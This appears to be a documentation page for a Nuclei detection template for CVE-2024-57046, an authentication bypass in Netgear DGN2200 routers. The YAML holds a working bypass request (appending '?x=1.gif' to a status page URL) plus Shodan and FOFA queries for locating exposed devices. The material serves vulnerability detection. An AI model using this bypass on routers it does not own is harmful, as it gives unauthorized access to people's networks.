Skip to content
Nuclei Templates

Netgear DGN2200 - Improper Authentication

ID: CVE-2024-57046

Severity: high

Author: ritikchaddha

Tags: cve,cve2024,netgear,router,auth-bypass,dgn2200

Description

Section titled “Description”

A vulnerability in the Netgear DGN2200 router with firmware version v1.0.0.46 and earlier permits unauthorized individuals to bypass the authentication. When adding “?x=1.gif” to the requested url, it will be recognized as passing the authentication.

YAML Source

Section titled “YAML Source”
id: CVE-2024-57046


info:
  name: Netgear DGN2200 - Improper Authentication
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in the Netgear DGN2200 router with firmware version v1.0.0.46 and earlier permits unauthorized individuals to bypass the authentication. When adding "?x=1.gif" to the requested url, it will be recognized as passing the authentication.
  reference:
    - https://github.com/Shuanunio/CVE_Requests/blob/main/Netgear/DGN2200/ACL%20bypass%20Vulnerability%20in%20Netgear%20DGN2200.md
    - https://www.netgear.com/about/security/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-57046
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2024-57046
    cwe-id: CWE-287
  metadata:
    verified: true
    max-request: 2
    vendor: Netgear
    product: DGN2200
    shodan-query: http.title:"DGN2200"
    fofa-query: title="NETGEAR DGN2200"
  tags: cve,cve2024,netgear,router,auth-bypass,dgn2200


http:
  - raw:
      - |
        GET /RST_status.htm HTTP/1.1
        Host: {{Hostname}}


      - |
        GET /RST_status.htm?x=1.gif HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body_2, "<title>Router Status", "Show Statistics")'
          - 'status_code_1 == 401 && status_code_2 == 200'
        condition: and
# digest: 4b0a004830460221009e4c29a3e7aea4b752e3a81ac3265883b68e8d6e42e2726bb0946bcb6ea2e8ff0221009d07cf7fabfdcec96a0b0c1b5c7a1a91beb2ae5ee266d0a6c7135f10b52f6ea9:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-57046.yaml"

View on Github